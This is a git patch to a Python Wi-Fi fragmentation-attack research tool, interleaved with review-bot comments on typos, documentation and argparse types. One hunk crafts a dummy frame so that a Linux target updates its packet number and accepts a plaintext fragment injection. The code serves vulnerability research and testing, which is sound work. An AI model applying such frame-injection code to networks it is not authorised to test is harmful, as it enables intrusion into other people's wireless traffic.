From 4ef5b08880c8b1a63eb4851536e29b1a9146e3da Mon Sep 17 00:00:00 2001
From: Mathy
Date: Thu, 23 Apr 2020 15:43:47 -0400
Subject: [PATCH] fragattacks: avoid false positives in linux plaintext test
---
 research/fragattack.py | 14 ++++++++------
 1 file changed, 8 insertions(+), 6 deletions(-)
diff --git a/research/fragattack.py b/research/fragattack.py
index 5202a1b39..76e568429 100755
--- a/research/fragattack.py
+++ b/research/fragattack.py
@@ -300,11 +300,11 @@ class LinuxTest(Test):
 # Fragment 1: normal
 self.actions[0].frame = frag1
 
- # Fragment 2: make Linux update latest used crypto Packet Number.
- # We only change the sequence number since that is not authenticated.
- frag2enc = frag2.copy()
- frag2enc.SC ^= (1 << 4)
- self.actions[1].frame = frag2enc
+ # Fragment 2: make Linux update latest used crypto Packet Number. Use a dummy packet
+ # that can't accidently aggregate with the first fragment in a corrrect packet.
+ p = station.get_header()/LLC()/SNAP()/IP()
+ p.SC = frag2.SC ^ (1 << 4)
+ self.actions[1].frame = p
 
 # Fragment 3: can now inject last fragment as plaintext
 self.actions[2].frame = frag2
@@ -1159,6 +1159,8 @@ def stract2action(stract):
 return Action(trigger, action=Action.GetIp)
 elif c == 'R':
 return Action(trigger, action=Action.Rekey)
+ elif c == 'C':
+ return Action(trigger, action=Action.Reconnect)
 elif c == 'P':
 return Action(trigger, enc=False)
 elif c == 'E':
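Review bot: The new comment on the Fragment 2 block has two typos and does not say what makes the dummy frame safe, which is the whole point of the change; I would write it as `# Fragment 2: make Linux update the latest used crypto Packet Number. Use a dummy packet (an empty IP header with a different sequence number) that cannot accidentally reassemble with the first fragment into a correct packet.` The dummy keeps frag2's fragment number and only flips the lowest sequence-number bit (`p.SC = frag2.SC ^ (1 << 4)`), so whether it can still pair with frag1 also depends on what `station.get_header()` puts in the frame-control flags; presumably it builds a plain non-fragmented header, but a one-line comment stating that would save the next reader from checking. The enclosing method of LinuxTest starts and ends outside the hunk, and `frag1`, `frag2` and `station` are defined there.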
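Review bot: The new `'C'` branch in stract2action maps a letter to Action.Reconnect without any visible documentation of the letter scheme; if the CLI usage text or a module docstring enumerates the action letters (`R` for Rekey, `P` for plaintext, and so on), it should gain an entry such as `C: reconnect (Action.Reconnect)` so the option stays discoverable. The function begins outside the hunk, so I cannot see whether a trailing else branch rejects unknown letters.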
@@ -1294,7 +1296,7 @@ if __name__ == "__main__":
 parser.add_argument('--peerip', help="IP of the device we will test.")
 parser.add_argument('--ap', default=False, action='store_true', help="Act as an AP to test clients.")
 parser.add_argument('--debug', type=int, default=0, help="Debug output level.")
- parser.add_argument('--delay', type=int, default=0, help="Delay between fragments in certain tests.")
+ parser.add_argument('--delay', type=float, default=0, help="Delay between fragments in certain tests.")
 parser.add_argument('--inc_pn', type=int, default=1, help="To test non-sequential packet number in fragments.")
 parser.add_argument('--msdu', default=False, action='store_true', help="Encapsulate pings in an A-MSDU frame.")
 parser.add_argument('--arp', default=False, action='store_true', help="Override default request with ARP request.")
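Review bot: `--delay` now parses as float but its default stays the int `0`, because argparse applies `type` only to strings taken from the command line; `parser.add_argument('--delay', type=float, default=0.0, help="Delay between fragments in certain tests.")` keeps the option's value a float on both paths. Negative values are still accepted as written; if the delay is later handed to time.sleep that fails at run time rather than at parse time, so stating the unit in the help text (seconds, presumably) would be worth adding once confirmed.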